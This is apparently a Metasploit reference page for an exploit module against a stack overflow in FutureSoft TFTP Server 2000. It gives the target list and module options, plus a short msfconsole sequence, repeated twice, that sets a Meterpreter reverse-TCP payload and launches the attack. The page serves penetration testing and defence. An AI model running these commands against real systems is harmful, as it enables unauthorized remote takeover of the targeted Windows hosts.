FutureSoft TFTP Server 2000 Transfer-Mode Overflow
This module exploits a stack buffer overflow in the FutureSoft TFTP Server 2000 product. By sending an overly long transfer-mode string, we were able to overwrite both the SEH and the saved EIP. A subsequent write-exception that will occur allows the transferring of execution to our shellcode via the overwritten SEH. This module has been tested against Windows 2000 Professional and for some reason does not seem to work against Windows 2000 Server (could not trigger the overflow at all).
Exploit Rank
- Average
Exploit Authors
- MC < mc [at] metasploit.com >
Vulnerability References
Exploit Targets
- 0 - Windows 2000 Pro English ALL
- 1 - Windows XP Pro SP0/SP1 English
- 2 - Windows NT SP5/SP6a English
- 3 - Windows 2003 Server English
Exploit Development
Similar Exploit Modules
- exploit/windows/tftp/attftp_long_filename
- exploit/windows/tftp/distinct_tftp_traversal
- exploit/windows/tftp/dlink_long_filename
- exploit/windows/tftp/opentftp_error_code
- exploit/windows/tftp/quick_tftp_pro_mode
- exploit/windows/tftp/tftpd32_long_filename
- exploit/windows/tftp/tftpdwin_long_filename
- exploit/windows/tftp/tftpserver_wrq_bof
- exploit/windows/tftp/threectftpsvc_long_mode
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/tftp/futuresoft_transfermode
msf exploit(futuresoft_transfermode) > show payloads
msf exploit(futuresoft_transfermode) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(futuresoft_transfermode) > set LHOST [MY IP ADDRESS]
msf exploit(futuresoft_transfermode) > set RHOST [TARGET IP]
msf exploit(futuresoft_transfermode) > show targets
msf exploit(futuresoft_transfermode) > set TARGET [TARGET ID]
msf exploit(futuresoft_transfermode) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/tftp/futuresoft_transfermode
msf exploit(futuresoft_transfermode) > show payloads
msf exploit(futuresoft_transfermode) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(futuresoft_transfermode) > set LHOST [MY IP ADDRESS]
msf exploit(futuresoft_transfermode) > set RHOST [TARGET IP]
msf exploit(futuresoft_transfermode) > show targets
msf exploit(futuresoft_transfermode) > set TARGET [TARGET ID]
msf exploit(futuresoft_transfermode) > exploit
Exploit Module Options
| RHOST | The target address |
| RPORT | The target port (default: 69) |
| CHOST | The local client address |
| CPORT | The local client port |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| DynamicSehRecord | Generate a dynamic SEH record (more stealthy) |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |